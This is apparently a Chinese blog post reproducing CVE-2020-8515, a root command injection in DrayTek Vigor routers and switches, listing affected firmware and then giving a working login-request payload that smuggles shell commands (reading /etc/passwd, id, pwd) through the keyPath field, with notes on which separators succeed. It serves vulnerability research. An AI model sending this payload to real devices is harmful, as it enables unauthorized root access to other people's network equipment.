Draytek企业网络设备命令注入复现(CVE-2020-8515)
一、漏洞描述
DrayTek URI未能正确处理SHELL字符,远程攻击者可以利用该漏洞提交特殊的请求,可以ROOT权限执行任意命令。
远程命令注入漏洞被标记为CVE-2020-8515,主要影响了DrayTek Vigor网络设备,包括企业交换机、路由器、负载均衡器和VPN网关。
二、影响范围
Vigor2960 < v1.5.1
Vigor300B < v1.5.1
Vigor3900 < v1.5.1
VigorSwitch20P2121 <= v2.3.2
VigorSwitch20G1280 <= v2.3.2
VigorSwitch20P1280 <= v2.3.2
VigorSwitch20G2280 <= v2.3.2
VigorSwitch20P2280 <= v2.3.2
三、漏洞复现
登录界面登录burp抓包:
抓取登录数据包添加keypath的paylod的字段
payloay:
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a
在这个基础上继续研究了本漏洞支持其他可以执行的命令:
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2f/etc/passwd%26id%26pwd&loginUser=a&loginPwd=a
shell方面,因为输入的命令是由mainfunction.cgi解析的,所以空格会被替换为“+”(存在一些困难)。
注入点涉及keyPath和rtick,和/www/cgi-bin/mainfunction.cgi文件有关,对应的web服务程序为/usr/sbin/lighttpd
主要是&符号的执行,可以进行拼接,但是|、;就不行
python脚本验证:
四、参考链接:
https://nosec.org/home/detail/4406.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8515
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
公众号:
thelostworld:
个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400
Draytek企业网络设备命令注入复现(CVE-2020-8515)相关推荐
- 查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)
OpenSSH命令注入漏洞复现(CVE-2020-15778) 目录 漏洞描述 漏洞等级 漏洞影响版本 漏洞复现 修复建议 ▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现.通 ...
- openssh漏洞_技术干货 | OpenSSH命令注入漏洞复现(CVE202015778)
本公众号发布的文章均转载自互联网或经作者投稿授权的原创,文末已注明出处,其内容和图片版权归原网站或作者本人所有,并不代表安全+的观点,若有无意侵权或转载不当之处请联系我们处理,谢谢合作! 欢迎各位添加 ...
- Foxit Reader(福昕阅读器)(CVE-2020-14425)命令注入漏洞复现
0x00简介 Foxit Reader,是一套用来阅读PDF格式文件的软件,由福建福昕软件所研发:2009年9月3日推出3.1.1 Build 0901最新版本.Foxit Reader是一套自由使用 ...
- CVE-2018-1111漏洞复现-环境搭建与dhcp命令注入
0×01 前言 2018年5月,在Red Hat Enterprise Linux多个版本的DHCP客户端软件包所包含的NetworkManager集成脚本中发现了命令注入漏洞(CVE-2018-11 ...
- 【安全漏洞】Cisco命令注入漏洞CVE-2021-1414分析
概述 最近关注了Cisco的一个命令注入漏洞CVE-2021-1414,命令注入之后可导致远程代码执行: 漏洞存在于固件版本低于V1.0.03.21的RV340系列路由器中,当前最新版本V1.0.03 ...
- OpenSSH 命令注入漏洞通告(CVE-2020-15778,Openssh <=8.3p1)
一.漏洞概要 2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开.OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者 ...
- CVE-2022-33891:Apache Spark 命令注入漏洞通告
0x01 漏洞简述 2022年07月19日,Apache官方发布了Apache Spark的风险通告,漏洞编号为CVE-2022-33891,漏洞等级:中危,漏洞评分:6.5. Apache Sp ...
- kylin源码调试_Apache Kylin 命令注入漏洞调试分析(CVE-2020-1956)
原标题:Apache Kylin 命令注入漏洞调试分析(CVE-2020-1956) 1.前言 Apache Kylin是一个开源的.分布式的分析型数据仓库,提供Hadoop/Spark 之上的 SQ ...
- java 漏洞挖掘_Apache Tika命令注入漏洞挖掘
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 介绍 这篇文章将从一个Apache tika服务器的命令注入漏洞到完全利用的步骤. ...
最新文章
- 考考基础部分,谈谈Java集合中HashSet的原理及常用方法
- python如何自学模块_跟老齐学Python之Import 模块
- 处理 Oracle SQL in 超过1000 的解决方案
- python集合类型_Python 的集合(set)类型
- 64位win7使用debug的方法
- 单片微型计算机简称单片机是指集成,什么是单片微型计算机 -解决方案-华强电子网...
- BUUOJ reverse 刮开有奖
- python 求子字符串_(6)KMP算法(求子串的位置)______字符串的匹配
- 疑似小米11 Pro保护壳曝光:横向矩阵相机设计
- SOTA太难了?试试Dropout
- Webpack4 学习笔记二 CSS模块转换
- 最短路POJ 1062 	昂贵的聘礼
- c语言case后面可以接表达式,c++ switch语句的使用(case 后面可以跟N个语句)
- 三星java手机播放器下载_8k视频播放器软件下载安卓-三星8k视频播放器KMPlayer下载v30.10.231 内置提取版-西西软件下载...
- Windows解压文件名乱码解决方法
- 微信Android客户端后台保活经验分享
- 不可错过的《一步一步学Spring Boot》视频教程
- 二维正态分布matlab程序,一维正态分布、二维正态分布的matlab实现
- 接口自动化测试概述及流程梳理
- 梦幻西游手游经验任务链计算机,梦幻西游手游任务链帮派求助刷经验技巧
热门文章
- 2011奥斯卡金像奖获奖名单(呵呵,里面的电影还是值得去看的!(*^__^*) )
- Hadoop之常见压缩格式以及性能对比
- 刘顺琦 - CSCI561 Related Vocabulary
- eclipse 操作
- Python-学习笔记
- java 输入狗狗的年龄换算成人的年龄
- python 虚部_python – Numpy警告:将Complex复制到实际丢弃的虚部
- 用matlab编写逢七必过游戏规则,数字图像处理及应用(MATLAB)第4章
- 超丰田追苹果,特斯拉凭什么成为全球市值第一车企?
- bzoj3047:Freda的传呼机bzoj2125: 最短路